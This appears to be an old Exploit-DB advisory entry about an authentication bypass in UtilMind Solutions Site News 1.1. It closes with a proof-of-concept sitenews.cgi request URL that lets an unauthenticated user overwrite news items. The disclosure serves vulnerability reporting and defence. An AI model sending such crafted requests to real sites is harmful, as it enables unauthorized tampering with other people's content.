UtilMind Solutions Site News 1.1 Authentication Bypass Vulnerability



EDB-ID: 24576 CVE: N/A OSVDB-ID: N/A
Author: anonymous Published: 2004-09-07 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
source: http://www.securityfocus.com/bid/11126/info

Reportedly UtilMind Solutions Site News is affected by an authentication bypass vulnerability. This issue is due to an access validation error.

An unauthenticated attacker can leverage this issue to display and manipulate arbitrary news items.

http://www.example.com/ sitenews.cgi?update\?oldsubject=OLD_SUBJ&subject=NEW_SUBJ&name=ANY_NAME&issue=ISSUE&message=MESSAGE